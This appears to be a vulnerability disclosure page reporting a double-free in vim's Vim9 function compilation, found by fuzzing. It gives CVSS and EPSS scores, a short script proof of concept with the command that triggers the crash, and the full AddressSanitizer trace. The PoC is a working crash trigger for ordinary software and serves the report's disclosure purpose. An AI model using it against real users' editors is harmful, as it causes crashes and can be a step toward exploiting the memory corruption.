7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
40.3%
Hello there! Hope you are having an awesome day! 🤗
After I saw the last Rick de Jager’s report, I decided to pick up their PoC as a valid input for fuzzing vim on its patch 8.2.3912, and ended up finding a new case of double-free!
For testing, I compiled vim with GCC 9.3.0, and my O.S. is a Linux Mint 20.04 amd64
Save the following file as poc
:
def FirstFunction()
def SecondFunction(
)
# Notice that the issue still happens if the right parenthesis
# of the second function ends up on the next line
enddef|BBBB
enddef
# Compile all functions
defcompile
After that, run vim
with the following command:
vim -u NONE -X -Z -e -s -S poc -c :qa!
Running this should result in a double-free detected.
vim -u NONE -X -Z -e -s -S poc -c :qa!
free(): double free detected in tcache 2
Aborted (core dumped)
=================================================================
==802955==ERROR: AddressSanitizer: attempting double-free on 0x604000000410 in thread T0:
#0 0x449add in free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add)
#1 0x11f3de5 in vim_free /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:619:2
#2 0x11f3de5 in get_function_body /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:843:8
#3 0x121b313 in define_function /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4371:9
#4 0x1268bed in compile_nested_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:881:13
#5 0x1268bed in compile_def_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:2870:14
#6 0x12240ef in ex_defcompile /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4705:9
#7 0x7ea32b in do_one_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:2572:2
#8 0x7ea32b in do_cmdline /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:994:17
#9 0xef5d80 in do_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:1423:5
#10 0xf035b7 in cmd_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:985:14
#11 0xf035b7 in ex_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:1011:2
#12 0x7ea32b in do_one_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:2572:2
#13 0x7ea32b in do_cmdline /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:994:17
#14 0x14c1e61 in do_cmdline_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:588:12
#15 0x14c1e61 in exe_commands /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:3080:2
#16 0x14c1e61 in vim_main2 /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:774:2
#17 0x14b9920 in main /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:426:12
#18 0x7fd8d254a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#19 0x3cfced in _start (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x3cfced)
0x604000000410 is located 0 bytes inside of 34-byte region [0x604000000410,0x604000000432)
freed by thread T0 here:
#0 0x449add in free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add)
#1 0x11ea6ed in vim_free /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:619:2
#2 0x11ea6ed in get_function_args /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:221:6
#3 0x1219def in define_function /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4258:9
#4 0x1268bed in compile_nested_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:881:13
#5 0x1268bed in compile_def_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:2870:14
#6 0x12240ef in ex_defcompile /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4705:9
previously allocated by thread T0 here:
#0 0x449d5d in malloc (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449d5d)
#1 0x47d1d6 in lalloc /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:244:11
SUMMARY: AddressSanitizer: double-free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add) in free
==802955==ABORTING
Use after free’s / double free’s can cause in memory corruption, that can cause a crash or other undefined (potentially exploitable) behaviour.
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
40.3%